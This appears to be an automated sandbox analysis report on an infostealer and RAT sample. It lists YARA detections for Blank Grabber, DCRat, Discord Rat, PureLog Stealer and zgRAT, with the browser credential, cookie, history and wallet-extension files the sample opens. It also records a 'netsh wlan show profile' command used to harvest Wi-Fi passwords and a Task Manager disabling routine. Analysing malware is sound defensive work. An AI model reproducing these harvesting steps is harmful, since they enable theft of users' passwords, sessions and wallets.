Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hr VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hy VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformation

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B05C330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00007FF72B05C330

Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe

Code function: 5_2_00007FF72B07518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

5_2_00007FF72B07518C

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

Code function: 13_2_00B4D076 GetVersionExW,

13_2_00B4D076

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Contains functionality to disable the Task Manager (.Net Source)

Source: RuntimeBroker2.0.exe.0.dr, Program.cs

.Net Code: DisableTaskManager

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000010.00000003.1795412848.0000014703693000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1795412848.0000014703695000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: based.exe PID: 7704, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI77042\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match

File source: 0000002A.00000002.2525882233.0000000012AFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Discord Rat

Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a37e08.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a10508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.RuntimeBroker2.0.exe.2227b640000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.87Bym0x4Fy.exe.3a24170.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 87Bym0x4Fy.exe PID: 6912, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker2.0.exe PID: 7176, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.exe, type: DROPPED

Yara detected PureLog Stealer

Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000000.1886461269.0000000000302000.00000002.00000001.01000000.00000029.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1830651243.0000000007241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1841385534.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.1839390909.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\cscript.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.s.exe.71dd711.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.ChainComServermonitor.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\powershell.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Uninstall Information\cmd.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\cscript.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\svchost.exe, type: DROPPED

Tries to harvest and steal WLAN passwords

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
